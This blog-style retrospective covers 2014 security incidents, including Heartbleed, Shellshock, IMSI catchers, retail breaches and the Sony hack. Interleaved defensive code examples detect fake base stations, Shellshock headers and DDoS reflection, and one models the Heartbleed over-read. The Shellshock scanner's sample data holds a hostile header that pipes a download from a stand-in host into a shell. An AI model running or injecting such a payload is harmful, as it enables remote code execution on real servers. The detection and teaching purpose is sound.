Aftermath: Security trends 2014

The assumptions I made in my Security trends 2014 posting are in italic font style.

There will still be NSA aftershocks as new material comes out and different parties react to it (and news sources write about it). U.S. cloud services have been called into question for good reason. There will be a lot of NSA spying litigation. Those spying issues will also fuel some hacktivism (it has already started to happen).

This has pretty much happened. A good deal of people aware of NSA leaker Edward Snowden have improved the security of their online activity after learning of his exploits, a large survey has found. Maybe Edward Snowden has been the best security educator ever, because it seems that the Snowden leaks prompted Internet users worldwide to protect their data: an international survey of Internet users found that more than 39% have taken steps to protect their online privacy and security as a result of the spying revelations by one-time NSA contractor Edward Snowden (706 million people have changed their behavior on the Internet because of what the NSA and GCHQ are doing). Two-thirds (64%) of users indicated they are more concerned today about online privacy than they were a year ago.

The use of security tools like HTTPS and the Tor network has increased. Today major players are turning encryption on by default, so that about 50% of web traffic is carried over HTTPS. The increased use of HTTPS has made life harder for IT departments, because normal firewalls can't look inside encrypted HTTPS traffic.

The Tor Project, the world’s most popular anonymity network, has continually resurfaced in the headlines, and not all of them have been positive. An international police bust of at least 17 hidden services like Silk Road 2.0 and Doxbin is only the latest notch on the belt of law enforcement agencies that have been closely watching Tor users for years.

Malware attacks, especially in Europe, nearly doubled in the first half of 2014. Government, financial services, telecommunications and energy were the most targeted sectors, collectively making up more than half of attacks. The UK, followed by Germany, were the two European countries most commonly targeted by malware-flinging, spear-phishing cyberspies.

Details of some serious spying malware have come to light. The intelligence-gathering super spyware Regin has been collecting information from Windows computers for many years (bits and pieces of the malware have been spotted by Microsoft, Kaspersky Lab, F-Secure and Symantec over the years). It had very many targets. Reports indicate that Belgian telecom giant Belgacom was under continuous attack for more than two years: in its digital attack on Belgacom, the British secret service was able to intercept more communications than was previously realised (from NATO and the EU, as well as from clients of hundreds of international telecoms providers). Regin further demonstrates that Western intelligence agencies are also involved in covert cyberespionage. But here’s a question no one is answering: given that this super-malware first popped up in 2008, why has everyone in the antivirus industry kept quiet about it until now?

The so-called advanced persistent threat (APT) “Turla” was disclosed in August. In addition to infecting Windows computers, it also used a powerful, highly stealthy Linux trojan that may have infected victims for years. For at least four years, the campaign targeted government institutions, embassies, military, education, research and pharmaceutical companies in more than 45 countries.

The use of hacking techniques and malware in state-sponsored espionage has been publicly documented over the last few years: China has been linked to extensive cyber espionage, and recently the Russian government was also alleged to have been behind a cyber attack on the White House. Regin shows that Western intelligence agencies are doing the same.

The Internet’s core was in danger: hackers compromised ICANN computers. A spear-phishing attack aimed at the US-based nonprofit Internet Corporation for Assigned Names and Numbers (ICANN) hooked staff members with emails. The stolen user names and passwords were used to access the Centralized Zone Data System, a repository that stores, among other things, the data needed to pair domain names with IP addresses and information on domain owners (including hashed usernames and passwords).

The use of fake mobile towers acting between the target mobile phone(s) and the service provider’s real towers has increased, or their use has now surfaced. An IMSI catcher subjects the phones in its vicinity to a man-in-the-middle attack, presenting itself to them as the preferred base station in terms of signal strength. US police have used fake mobile base stations to spy on citizens: a civil liberties group discovered emails showing that the US government has concealed police use of fake mobile base stations, which can spy on citizens without requiring search warrants, since at least 2009. Many fake mobile phone stations were found in the USA. There is an underground market for illegal telecoms equipment, much of which comes from China. Fake base stations were found in many other countries too. There is a market for tools that can detect fake base stations (for example the CryptoPhone 500, which costs $3500). It seems that foreign states have been spying on mobile phones in Finland, Sweden and Norway with fake base stations.
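How a fake base station betrays itself is worth making concrete. The following is an added example, not code from the original post or from any of the products mentioned (it is not the CryptoPhone’s algorithm): a scoring heuristic of the kind baseband-monitoring apps use, run over a constructed trace of serving-cell observations. The record format, the baseline of known cells and the point weights are assumptions for the illustration; the signals themselves follow from what an IMSI catcher has to do to work: overpower the real towers, force a location update and a fallback to 2G, and keep the phone from handing over to a genuine cell.

```python
from dataclasses import dataclass
from typing import Set, Tuple

# A single observation of the serving cell, as a phone's baseband would report it.
# Constructed record format for this example; the field names are assumptions.
@dataclass
class CellObservation:
    t: int               # seconds since start of trace
    rat: str             # radio access technology: "LTE", "UMTS" or "GSM"
    mcc: int             # mobile country code
    mnc: int             # mobile network code
    lac: int             # location/tracking area code
    cell_id: int
    cipher: str          # "A5/3", "A5/1", "A5/0" (none) on GSM; "UEA1"/"EEA2" on 3G/4G
    rssi_dbm: int        # received signal strength
    neighbors: int       # number of neighbour cells the base station advertises

@dataclass
class Baseline:
    """What the phone has learned about the area during normal operation."""
    known_cells: Set[Tuple[int, int, int, int]]  # (mcc, mnc, lac, cell_id)
    known_lacs: Set[int]
    typical_rssi_dbm: int  # median strength seen from genuine cells here

def score_observation(prev, obs, base):
    """Return (score, reasons). Higher = more like an IMSI catcher.
    Each heuristic matches one thing a fake base station has to do."""
    reasons = []
    score = 0
    if (obs.mcc, obs.mnc, obs.lac, obs.cell_id) not in base.known_cells:
        score += 2; reasons.append("cell never seen here before")
    if obs.lac not in base.known_lacs:
        # a new LAC forces a Location Update, which is when the phone discloses its IMSI
        score += 3; reasons.append("unknown LAC forces location update")
    if obs.rat == "GSM" and prev is not None and prev.rat in ("LTE", "UMTS"):
        # catchers deny 3G/4G so the phone falls back to 2G, which they can MITM
        score += 3; reasons.append("downgrade to 2G")
    if obs.rat == "GSM" and obs.cipher in ("A5/0", "none"):
        score += 4; reasons.append("2G connection without encryption")
    if obs.rssi_dbm >= base.typical_rssi_dbm + 20:
        # it must become the "preferred" cell, so it overpowers the real towers
        score += 1; reasons.append("signal much stronger than any genuine cell")
    if obs.neighbors == 0:
        # no neighbour list: the phone is never offered a handover away from it
        score += 2; reasons.append("empty neighbour list")
    return score, reasons

def find_suspicious(trace, base, threshold=6):
    """Walk the trace and return (time, cell_id, score, reasons) for suspicious cells."""
    flagged = []
    prev = None
    for obs in trace:
        score, reasons = score_observation(prev, obs, base)
        if score >= threshold:
            flagged.append((obs.t, obs.cell_id, score, reasons))
        prev = obs
    return flagged

# Constructed trace (Finnish MCC 244 is used only to illustrate the format).
BASELINE = Baseline(
    known_cells={(244, 5, 1001, 40001), (244, 5, 1001, 40002), (244, 5, 1001, 40003)},
    known_lacs={1001},
    typical_rssi_dbm=-85,
)
TRACE = [
    CellObservation(0,   "LTE", 244, 5, 1001, 40001, "EEA2", -84, 6),
    CellObservation(30,  "LTE", 244, 5, 1001, 40002, "EEA2", -88, 5),
    # a "tower" appears: 2G only, no cipher, unknown LAC, overpowering signal, no neighbours
    CellObservation(60,  "GSM", 244, 5, 7777, 65000, "A5/0", -51, 0),
    CellObservation(90,  "GSM", 244, 5, 7777, 65000, "A5/0", -50, 0),
    CellObservation(120, "LTE", 244, 5, 1001, 40003, "EEA2", -86, 6),
]

if __name__ == "__main__":
    for t, cid, score, reasons in find_suspicious(TRACE, BASELINE):
        print(f"t={t}s cell {cid}: score {score}: {', '.join(reasons)}")
```

No single signal is conclusive (a new legitimate cell also scores "never seen before"), which is why the heuristics are summed and thresholded rather than treated as individual alarms.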

Old telecom core protocols have proven to be vulnerable. Researchers discovered security flaws in SS7 that allow listening to private phone calls and intercepting text messages on a potentially massive scale, even when cellular networks are using the most advanced encryption now available. Attackers can repurpose normal functions for surveillance because of the lax security on the network: the housekeeping functions built into SS7 can locate callers anywhere in the world and listen to calls as they happen, so spies and criminals never need to break the radio encryption at all. And even as individual carriers harden their systems, they still must communicate with each other over SS7, leaving them open to any of the thousands of companies worldwide with access to the network.

The Security Professionals: Top Cyber Threat Predictions for 2014 article lists the following predictions, which seem pretty probable: Cybersecurity Regulatory Efforts Will Spark Greater Need for Harmonization, Service-Impacting Interruptions for Online Services Will Persist, We Will See an Increase in Cybercrime Activity Related to the World Cup, Rise of Regional Cloud Services, Dev-Ops Security Integration Fast Becoming Critical, Cybercrime that Leverages Unsupported Software will Increase, Increase in Social Engineering and Ransomware will Impact More People.

This list pretty much describes what happened in 2014. It was a spot-on set of predictions.

Ubiquitous mobile computing is all around us, which will lead to increased risks and concerns about social network privacy. Social networks have quickly become the key organizing principle of Internet communication and collaboration.

Social networks are used more and more. There are privacy issues on social networks, but there are also secondary issues in their wider uses. Nowadays many web sites support social media logins, and hackers are attacking them, for example with the ‘SpoofedMe’ social login attack.
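The SpoofedMe attack (IBM’s 2014 research) works because some identity providers let a user register with an e-mail address they never verify, and some relying-party sites then log that user in to whichever local account has the same e-mail address. The following is an added example, not code from the original post or from any affected site: a minimal relying party in its vulnerable form and its hardened form, which binds the social identity to (issuer, subject) and only uses the e-mail claim when the provider says it is verified. The assertion fields, the issuer URL and the account store are assumptions for the illustration.

```python
from dataclasses import dataclass
from typing import Dict, Optional, Tuple

@dataclass(frozen=True)
class Assertion:
    """What the identity provider tells the relying party after social login.
    Constructed for this example; real providers carry these as OpenID Connect claims."""
    issuer: str           # which identity provider issued this
    subject: str          # provider-local stable user id
    email: str
    email_verified: bool  # whether the provider ever confirmed the mailbox

class VulnerableSite:
    """Links the social identity to a local account by e-mail address alone."""
    def __init__(self):
        self.accounts: Dict[str, str] = {}   # email -> local user id

    def register_local(self, email: str, user_id: str):
        self.accounts[email] = user_id

    def social_login(self, a: Assertion) -> Optional[str]:
        # anyone who can register the victim's address at a lax provider gets in
        return self.accounts.get(a.email)

class HardenedSite:
    """Binds on (issuer, subject); uses the e-mail claim only when verified."""
    def __init__(self):
        self.accounts: Dict[str, str] = {}
        self.links: Dict[Tuple[str, str], str] = {}   # (issuer, subject) -> user id
        self.trusted_issuers = {"https://idp.example/"}  # assumption for the example

    def register_local(self, email: str, user_id: str):
        self.accounts[email] = user_id

    def social_login(self, a: Assertion) -> Optional[str]:
        if a.issuer not in self.trusted_issuers:
            return None
        user = self.links.get((a.issuer, a.subject))
        if user is not None:
            return user                      # identity already linked: e-mail is irrelevant
        if not a.email_verified:
            return None                      # never match an account on an unverified claim
        user = self.accounts.get(a.email)
        if user is None:
            return None
        self.links[(a.issuer, a.subject)] = user   # link once, on a verified match
        return user

def demo():
    victim_email = "victim@example.org"
    # Attacker registers at a provider that does not verify e-mail, using the victim's address.
    spoofed = Assertion("https://idp.example/", "attacker-42", victim_email, email_verified=False)
    genuine = Assertion("https://idp.example/", "victim-7", victim_email, email_verified=True)
    # Later the victim's provider reports a different address; the link must still hold.
    relogin = Assertion("https://idp.example/", "victim-7", "changed@example.org", email_verified=False)

    weak = VulnerableSite()
    weak.register_local(victim_email, "user-1")
    strong = HardenedSite()
    strong.register_local(victim_email, "user-1")
    return {
        "vulnerable_attacker": weak.social_login(spoofed),      # "user-1": account taken over
        "hardened_attacker": strong.social_login(spoofed),      # None
        "hardened_victim": strong.social_login(genuine),        # "user-1"
        "hardened_victim_relogin": strong.social_login(relogin) # "user-1" via the stored link
    }

if __name__ == "__main__":
    for k, v in demo().items():
        print(f"{k}: {v}")
```

The defensive rule is the same one OpenID Connect spells out: the pair (issuer, subject) is the identity; an e-mail address is an attribute, and an unverified one is attacker-controlled input.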

Android anti-virus apps CAN’T kill nasties on sight like normal AV.

Android malware has been in the news quite often. Traditional AV companies have complained that they can’t scan the whole device like they could on a PC. To address that, Google has made major security enhancements to Android 4.4 and Android 5.0. Android 5.0 also has a number of under-the-hood changes, including some major updates to the overall security of the platform. The biggest roadblock to mobile device security is actually user apathy: people skip basic security practices like setting a lock screen PIN code because it’s inconvenient when you’re checking your device every few minutes. There are usability improvements that hopefully help.

2013 was a very hacked year, when there were many cases where information on millions or tens of millions of users was stolen from companies. It’s likely that we will see much more of the same in 2014; the way people use passwords and how the on-line services are built have not changed much in one year.

It seems to me that 2014 was much worse than 2013. There have been lots of hacking incidents, and some of the basic building blocks of our IT world have been seriously hacked.

USB security is fundamentally broken: consider all USB devices potentially dangerous. The BadUSB attack shows that the USB controllers in very many USB devices can be reprogrammed to turn the device into an attack device. It is practically impossible to know whether any unit has been reprogrammed to compromise computers. Once infected through USB, malware can use peripherals as a hiding place, hindering system clean-up. As long as USB controllers are reprogrammable, USB peripherals should not be shared with others. There are no easy or quick fixes to this serious problem. Malicious firmware could easily spoof its legitimacy to foil malware scans. A little USB device can hack your computer in no time flat without you knowing about it. It’s a classic scene from basically every spy movie in history; in this case, however, that mystery device is real. It is pretty easy to make a device that pretends to be a keyboard/mouse, or does even nastier things. That’s kind of terrifying. So what can you do to protect yourself from things like this? Not a whole lot, really; that’s why attacks like this and BadUSB are so freaky.

This was the year of well-branded vulnerabilities: 2014 was the year when newly found security vulnerabilities started to be branded with catchy names, logos and web sites.

Open source security was hit very badly with Heartbleed and Shellshock. The Heartbleed bug allowed anyone on the Internet to read the memory of systems protected by vulnerable versions of the OpenSSL software. This was a very severe two-year-old security hole right in the core of Internet security, the TLS implementation behind HTTPS. Heartbleed affected a large share of web servers, email servers, chat servers, virtual private networks (SSL VPNs), network appliances, a wide variety of client side software, mobile apps and Internet-connected embedded devices.
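The bug itself is a missing bounds check in the heartbeat handler: the server trusts the 16-bit payload length carried in the message and copies that many bytes back, regardless of how long the received record actually was. The following is an added example, not OpenSSL’s code or anything from the original post: a Python model of the vulnerable handler beside the fixed one, run over a constructed “heap” where the heartbeat record is followed by data from other connections. The message structure follows RFC 6520 and the check mirrors the one added in OpenSSL 1.0.1g; the memory layout and the secret strings are made up for the illustration.

```python
import struct

TLS1_HB_REQUEST = 1
TLS1_HB_RESPONSE = 2
PADDING = 16  # minimum padding in an RFC 6520 heartbeat message

def build_heartbeat(payload: bytes, claimed_len: int = None) -> bytes:
    """Build a heartbeat request; claimed_len lets the sender lie about the payload size."""
    if claimed_len is None:
        claimed_len = len(payload)
    return struct.pack("!BH", TLS1_HB_REQUEST, claimed_len) + payload + b"\x00" * PADDING

def vulnerable_process_heartbeat(memory: bytearray, record_len: int) -> bytes:
    """Model of OpenSSL 1.0.1-1.0.1f tls1_process_heartbeat: trusts the length field.
    `memory` holds the received record followed by whatever else sat in the heap."""
    hbtype, payload_len = struct.unpack("!BH", bytes(memory[:3]))
    if hbtype != TLS1_HB_REQUEST:
        return b""
    # memcpy(bp, pl, payload) with no comparison against record_len: reads past the record
    echoed = bytes(memory[3:3 + payload_len])
    return struct.pack("!BH", TLS1_HB_RESPONSE, payload_len) + echoed + b"\x00" * PADDING

def fixed_process_heartbeat(memory: bytearray, record_len: int) -> bytes:
    """The 1.0.1g fix: the whole claimed message must fit inside the received record."""
    if record_len < 1 + 2 + PADDING:
        return b""                       # too short to be a heartbeat: silently discard
    hbtype, payload_len = struct.unpack("!BH", bytes(memory[:3]))
    if hbtype != TLS1_HB_REQUEST:
        return b""
    if 1 + 2 + payload_len + PADDING > record_len:
        return b""                       # claimed payload longer than the record: discard
    echoed = bytes(memory[3:3 + payload_len])
    return struct.pack("!BH", TLS1_HB_RESPONSE, payload_len) + echoed + b"\x00" * PADDING

def leaked_bytes(response: bytes, real_payload: bytes) -> bytes:
    """Everything echoed back beyond the payload the client actually sent."""
    if not response:
        return b""
    payload_len = struct.unpack("!H", response[1:3])[0]
    return response[3:3 + payload_len][len(real_payload):]

# Constructed heap layout: a 3-byte payload "abc" claiming to be 64 bytes long,
# followed in memory by leftovers from other connections.
REAL_PAYLOAD = b"abc"
RECORD = build_heartbeat(REAL_PAYLOAD, claimed_len=64)
RECORD_LEN = len(RECORD)   # 22 bytes actually received
HEAP = bytearray(RECORD + b"session_cookie=SECRET123; password=hunter2; " + b"\x00" * 64)

def demo():
    """Return (bytes leaked by the vulnerable handler, bytes leaked by the fixed one)."""
    vuln = leaked_bytes(vulnerable_process_heartbeat(HEAP, RECORD_LEN), REAL_PAYLOAD)
    safe = leaked_bytes(fixed_process_heartbeat(HEAP, RECORD_LEN), REAL_PAYLOAD)
    return vuln, safe

if __name__ == "__main__":
    vuln, safe = demo()
    print("vulnerable leaked", len(vuln), "bytes:", vuln)
    print("fixed leaked", len(safe), "bytes")
```

Repeating the request with claimed_len set to 65535 is exactly what the public proof-of-concept scanners did; each round trip returns up to 64 KB of whatever the process had in memory next to the record, which is why private keys and session cookies were recoverable.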

Later in the year HTTPS was hit again with the POODLE bug, a padding oracle attack that lets a man-in-the-middle decrypt parts of an SSL 3.0 connection (for example session cookies) after forcing a browser to fall back to that protocol version. It hit around 10 percent of websites, including some of the Internet’s top websites. The POODLE attack rendered the already old SSL 3.0 encryption useless, and support for it is being phased out in web browsers and servers.

CVE-2014-6271, also known as “Shellshock” or the Shell Shocked bash bug, had been around for a long, long time (around 20 years). The vulnerability affects versions 1.14 through 4.3 of GNU Bash. That means there are lots of old devices on the network vulnerable to this bug. The number of systems needing to be patched, but which won’t be, is much larger than for Heartbleed. It’s things like CGI scripts that are vulnerable, deep within a website. This was not only a Linux problem: it could allow attackers to execute code on Linux, Unix and Mac OS X.
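How a web server exposes bash to this bug: a CGI gateway copies every request header into an environment variable (User-Agent becomes HTTP_USER_AGENT), and a vulnerable bash, on start-up, treats any variable whose value begins with “() {” as a function definition and executes whatever follows the closing brace. The following is an added example, not code from the original post: a Python scanner that applies the CGI naming rule to a request and flags the telltale pattern both in the resulting environment and in Apache combined-format access log lines. The headers and log lines are constructed for the illustration.

```python
import re
from typing import Dict, List

# Vulnerable bash (CVE-2014-6271) parses "() { ... }" at the start of an environment
# variable's value as a function and then keeps executing what follows the brace.
# Anything that copies attacker-controlled strings into the environment is an entry point;
# CGI does this for every HTTP header.
SHELLSHOCK_RE = re.compile(r"\(\)\s*\{[^}]*\}\s*;\s*(.+)", re.DOTALL)

def cgi_environment(headers: Dict[str, str]) -> Dict[str, str]:
    """Mirror the CGI/1.1 rule: header name -> HTTP_ + upper case with '-' as '_'."""
    return {"HTTP_" + k.upper().replace("-", "_"): v for k, v in headers.items()}

def find_shellshock(env: Dict[str, str]) -> List[str]:
    """Return 'VAR: trailing command' for every variable carrying a function bomb."""
    hits = []
    for name, value in env.items():
        m = SHELLSHOCK_RE.search(value)
        if m:
            hits.append(f"{name}: {m.group(1).strip()}")
    return hits

def scan_access_log(lines: List[str]) -> List[str]:
    """Apache combined-log lines: the User-Agent is the last quoted field.
    Returns the client IP of every line whose User-Agent carries the pattern."""
    offenders = []
    for line in lines:
        fields = line.rsplit('"', 2)          # [..., user_agent, ""]
        user_agent = fields[-2] if len(fields) >= 2 else ""
        if SHELLSHOCK_RE.search(user_agent):
            offenders.append(line.split(" ", 1)[0])
    return offenders

# Constructed request headers and log lines for the example (not real traffic).
MALICIOUS_HEADERS = {
    "Host": "www.example.com",
    "User-Agent": "() { :;}; /bin/bash -c 'curl http://203.0.113.5/x | sh'",
    "Cookie": "() { ignored; }; echo pwned",
    "Accept": "*/*",
}
LOG_LINES = [
    '198.51.100.7 - - [25/Sep/2014:10:02:11 +0000] "GET /cgi-bin/status HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [25/Sep/2014:10:02:13 +0000] "GET /cgi-bin/status HTTP/1.1" 200 512 "-" "() { :;}; /bin/ping -c1 203.0.113.9"',
]

if __name__ == "__main__":
    for hit in find_shellshock(cgi_environment(MALICIOUS_HEADERS)):
        print("env:", hit)
    print("log offenders:", scan_access_log(LOG_LINES))
```

The pattern is also what the September 2014 web application firewall signatures keyed on; it catches the original CVE-2014-6271 payload shape, not the follow-up parser bugs (CVE-2014-7169 and later), which is one reason patching mattered more than filtering.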

Windows security was also hit: the Sandworm security issue would trigger UAC (User Account Control) on Windows. Windows also had its own Shellshock-style security issue: Microsoft fixed a severe 19-year-old Windows bug found in everything since Windows 95. The vulnerability (CVE-2014-6332) was rated a critical score of 9.3 in all versions of Windows and was described as a rare “unicorn-like” bug in Internet Explorer-dependent code that opens avenues for man-in-the-middle attacks. A separate critical hole (MS14-066) affecting Microsoft’s Secure Channel (SChannel), which implements the Secure Sockets Layer and Transport Layer Security protocols, was also patched: if an attacker modified packets in a particular way and attacked your machine, they may be able to execute whatever code they like remotely without an authorized account.

Misfortune Cookie is a critical vulnerability that allows an intruder to remotely take over an Internet router and use it to attack home and business networks. Researchers have detected approximately 12 million readily exploitable unique devices connected to the Internet in 189 countries across the globe, making this one of the most widespread vulnerabilities revealed in recent years. All an attacker needs in order to exploit Misfortune Cookie is to send a single packet to your public IP address (a simple modern browser can do that). Misfortune Cookie affects any implementation of a service using the old version of RomPager’s HTTP parsing code, on ports 80, 8080, 443, 7547 and others (devices managed by TR-069 or a web browser). The vulnerability allows an attacker to take over device settings and turn off all firewall settings (WAN-to-LAN free crossing, which makes it possible for the attacker to try to access your home webcam or extract data from your business NAS backup drive, both potentially using default credentials and/or having their own vulnerabilities). This should be considered an alarming wake-up call for the embedded device industry and consumers alike: the vulnerable code is from 2002 and was actually fixed in 2005, and yet the fix still did not make it into consumer devices. Watch for firmware updates from your device vendor addressing Misfortune Cookie and apply the update as soon as it is released. Remember that your router’s security should be just one layer in your multi-layer network security defenses.

Large scale privacy scandals:

Celebrity photo leak 2014 generated many headlines. Beginning August 31, 2014, a collection of almost 500 private pictures of various celebrities (photos and videos of more than 100 individuals, including 26 celebrities), mostly women and many containing nudity, were posted on the imageboard 4chan and later disseminated by other users on websites and social networks. The images were believed to have been obtained via a breach of Apple‘s cloud services suite iCloud using a “very targeted attack” on account information.

 

Russian hacked webcam scandal: too many people are leaving their internet-connected webcams (CCTV cameras and baby monitors) wide open to abuse. A Russian website, insecam.cc, accessed the cams using the default login credentials, which are freely available online for thousands of devices. Insecam offered tens of thousands of feeds from IP cameras all over the world for some time before the anonymous programmer shut the website down. Whether or not it violated any security and privacy laws has been a matter of some debate. Everyone should make sure they’ve changed the passwords on their devices from the factory defaults, which scumbags are exploiting to spy on victims from afar. It is very important to educate consumers that changing default passwords is extremely important to protect themselves from unwanted intruders.

Attacks against banking and businesses:

Financial security problems in the USA were touching every other household: some 45% of Americans say they or a household member have been notified by a credit card company, financial institution or retailer that their credit card information had possibly been stolen as part of a data breach.

The huge cyberattack on JPMorgan Chase that touched more than 83 million households and businesses was one of the most serious computer intrusions into an American corporation.

Almost 100 million credit card details were revealed in a series of serious retailer breaches (Target, Home Depot, Neiman Marcus etc.). Organized crime groups are actively distributing malicious code and compromising the network environments of merchants and their credit card devices. A growing list of POS malware variants (POSCLOUD, Nemanja, JackPOS, BlackPOS and Decebal) is being developed by underground cyber criminals because of the high ROI when they hit a retailer like Target or Home Depot. As more and more breach reports come up, consumers are officially starting to get breach fatigue, fraud shops are overstocked with stolen credit cards, and banks are bringing breached companies to court to pay for the damages caused to them.

It seems like 2014 has almost been “The Year of PoS Breaches.” Can we learn from big breaches? At least companies will face more stringent regulations: the new Payment Card Industry Data Security Standard 3.0 (PCI DSS 3.0) becomes mandatory for all businesses that store, process or transmit payment card information beginning 1 January 2015. The revamped standard includes requirements aimed at third-party providers. The changes follow a string of high profile breaches.

There has been a long history of security companies hyping up remote threats in press releases. Then came a big corporate hit as bad as it can get: the Sony Pictures hack was even worse than everyone thought. One of the biggest Hollywood studios and TV production companies was hit very seriously. Sony employees faced ‘weeks of pen and paper’ after the crippling network hack: the infiltration by hackers left Sony employees “sitting at their desks trying to do their job with a pen and paper”. It could take three weeks to clean up the mess and get things back to normal. A lot of data was leaked, including unreleased movies uploaded to pirate sites, contract details posted on-line, password lists posted on-line, and everything from medical records to unreleased scripts. A recent report from the consulting firm PricewaterhouseCoopers estimated that more than 117,000 cyberattacks hit businesses each day, but few are on the scale of the blow dealt to Sony: “It’s obvious from the scope of what’s been done that the intruders owned the entire environment”. Sony has seen gigabytes of information leaked onto the internet (for example sensitive information and unreleased movies).

The Sony hack is different from most past hacks on this scale because the people who got the information don’t seem to be out for personal gain. Instead, they’re actively trying to embarrass and perhaps even destroy the company. The motives of sophisticated hackers have changed from self-gain to destruction. There have been estimates that Sony could suffer a loss of more than $100 million, and that was before a couple of former employees sued the company. The incident caused Sony Pictures to cancel the release of the movie The Interview. There has been a debate going on in the USA over whether this kind of cyber-attack could be considered an act of war.

This was not the only attack that tried to damage a company. The Now at the Sands Casino: An Iranian Hacker in Every Server article tells how computer engineers at Las Vegas Sands Corp. (LVS) raced to figure out what was happening when it was under a withering cyber attack. PCs and servers were shutting down in a cascading IT catastrophe, with many of their hard drives wiped clean. The $14 billion operation had sputtered to a halt. This was no Ocean’s Eleven. The hackers were not trying to empty a vault of cash, nor were they after customer credit card data. This was personal. The perpetrators wanted to punish the company, or, more precisely, its chief executive officer and majority owner, the billionaire Sheldon Adelson. This happened some months before the Sony event. This was likely the first time that a foreign player simply sought to destroy American corporate infrastructure on such a scale.

 

There were plans to disturb computer gaming companies. The How A Hacker Gang Literally Saved Christmas For Video Game Players Everywhere article tells that at the start of December, a notorious hacker gang named “Lizard Squad” issued a threat: it would take down the PlayStation and Xbox Live networks over Christmas, the online services that some video games need in order to run from a home console. Lizard Squad is one of the most well-known online hacker groups and has a history of attacking popular video game services, most recently taking the PlayStation and Xbox networks offline in December. A group known as “The Finest Squad” emerged in December with the intention of bringing “cyber-criminals to justice” and managed to break into the public Twitter accounts and websites of Lizard Squad’s members, releasing their names and photographs online.

Gartner predicts that through 2014, improved JavaScript performance will begin to push HTML5 and the browser as a mainstream enterprise application development environment. I expect that HTML5 related security issues will increase due to the fact that the technology is being used more in 2014.

HTML5 was really pushed to the mainstream. It is used visibly in many applications and also very much in the background in very many mobile apps. The use of HTML5 has increased, but it does not seem to have turned into a major security problem. So the security situation on HTML5 seems to be better than what I expected.

Over 50% of net traffic to web sites is made by bots! The More Than Half of Internet Traffic Is Just Bots article says that security and cloud service provider Incapsula analyzed traffic and found that more than 60 percent of internet traffic is computer generated, compared to less than 40 percent of traffic that is driven by human clicks. 31% of bots are still malicious. SEO link building has always been a major motivation for automated link spamming, but it is decreasing because Google was able to discourage it. There is more advanced hacking and automatic vulnerability searching.

DDoS attacks are evolving from volumetric Layer 3-4 attacks to much more sophisticated and dangerous Layer 7 multi-vector threats.

There have been a series of dangerous attack vectors and very large volumetric DDoS attacks over the year 2014. DNS amplification attacks and NTP amplification attacks became popular: the attacker sends small requests with the victim’s spoofed source address to open DNS resolvers or NTP servers, which answer the victim with responses many times larger. There were huge attacks that peaked at over 400Gbps.
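From the victim’s side, the signature of a reflection attack is UDP replies from DNS or NTP servers that nobody on the network asked for, arriving from many reflectors at once. The following is an added example, not from the original post: a Python check over constructed flow records (as a border router might export them) that pairs inbound DNS/NTP replies with the requests our network actually sent, computes the amplification factor where a request exists, and flags hosts receiving unsolicited replies from several reflectors. The record format, the address prefix and the thresholds are assumptions for the illustration.

```python
from collections import defaultdict
from dataclasses import dataclass
from typing import List

AMPLIFIER_PORTS = {53: "DNS", 123: "NTP"}  # the services abused in 2014's largest attacks

@dataclass(frozen=True)
class Flow:
    """One unidirectional flow record (constructed format for the example)."""
    src: str
    sport: int
    dst: str
    dport: int
    proto: str
    packets: int
    bytes: int

def reflection_report(flows: List[Flow], our_prefix: str):
    """For each (our host, reflector, service) compare bytes we sent with bytes we got back.
    A reply with no matching request is reflected traffic: someone spoofed our address."""
    requests = defaultdict(int)   # (our host, reflector, service) -> bytes sent
    replies = defaultdict(int)    # same key -> bytes received
    for f in flows:
        if f.proto != "UDP":
            continue
        if f.src.startswith(our_prefix) and f.dport in AMPLIFIER_PORTS:
            requests[(f.src, f.dst, AMPLIFIER_PORTS[f.dport])] += f.bytes
        elif f.dst.startswith(our_prefix) and f.sport in AMPLIFIER_PORTS:
            replies[(f.dst, f.src, AMPLIFIER_PORTS[f.sport])] += f.bytes
    report = []
    for (host, reflector, service), bytes_in in replies.items():
        bytes_out = requests.get((host, reflector, service), 0)
        report.append({
            "victim": host, "reflector": reflector, "service": service,
            "bytes_in": bytes_in, "bytes_out": bytes_out,
            "amplification": bytes_in / bytes_out if bytes_out else float("inf"),
            "unsolicited": bytes_out == 0,
        })
    return report

def suspected_victims(report, min_unsolicited_reflectors: int = 3) -> List[str]:
    """A host receiving unsolicited DNS/NTP replies from several reflectors is under attack."""
    count = defaultdict(int)
    for r in report:
        if r["unsolicited"]:
            count[r["victim"]] += 1
    return sorted(h for h, n in count.items() if n >= min_unsolicited_reflectors)

# Constructed flows (not real traffic). Our network is 10.0.0.0/16 here.
FLOWS = [
    # legitimate: our resolver queries 192.0.2.53 and gets a normal-sized answer back
    Flow("10.0.0.2", 41000, "192.0.2.53", 53, "UDP", 1, 60),
    Flow("192.0.2.53", 53, "10.0.0.2", 41000, "UDP", 1, 180),
    # attack: NTP monlist-sized replies from several servers to 10.0.0.9, which never asked
    Flow("198.51.100.1", 123, "10.0.0.9", 80, "UDP", 100, 48200),
    Flow("198.51.100.2", 123, "10.0.0.9", 80, "UDP", 100, 48200),
    Flow("198.51.100.3", 123, "10.0.0.9", 80, "UDP", 100, 48200),
    # and large DNS answers from open resolvers to the same host
    Flow("203.0.113.77", 53, "10.0.0.9", 80, "UDP", 50, 150000),
    Flow("203.0.113.78", 53, "10.0.0.9", 80, "UDP", 50, 150000),
]

if __name__ == "__main__":
    report = reflection_report(FLOWS, "10.0.")
    for r in report:
        print(r)
    print("suspected victims:", suspected_victims(report))
```

The same pairing logic, run on the reflector’s side (replies far larger than the requests that triggered them, to destinations that never complete any other exchange), is how open-resolver and NTP operators spot that they are being used as amplifiers; the mitigation there is rate limiting and disabling monlist, and on the network edge it is BCP 38 source address validation, which is what the spoofing depends on.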

There will still be many SCADA security issues in 2014. Even though traditional SCADA vulnerabilities have become easier to find, the increased connectivity brought by IoT will cause new issues. And there will still be very many control systems openly accessible from the Internet to practically everybody who knows how to find them. A large number of SCADA systems were found open on the Internet at the beginning of 2013, and the numbers did not drop considerably during the year. I expect that very many of those systems will still be too open at the end of 2014.

A large number of SCADA system vulnerabilities and open systems were found in 2014. Many SCADA systems are still too open; it seems that much of the world’s factories and critical infrastructure aren’t properly protected against hackers. Researchers have found vulnerabilities in industrial control systems that they say grant full control of systems running energy, chemical and transportation systems. Over 60,000 exposed control systems were found online.

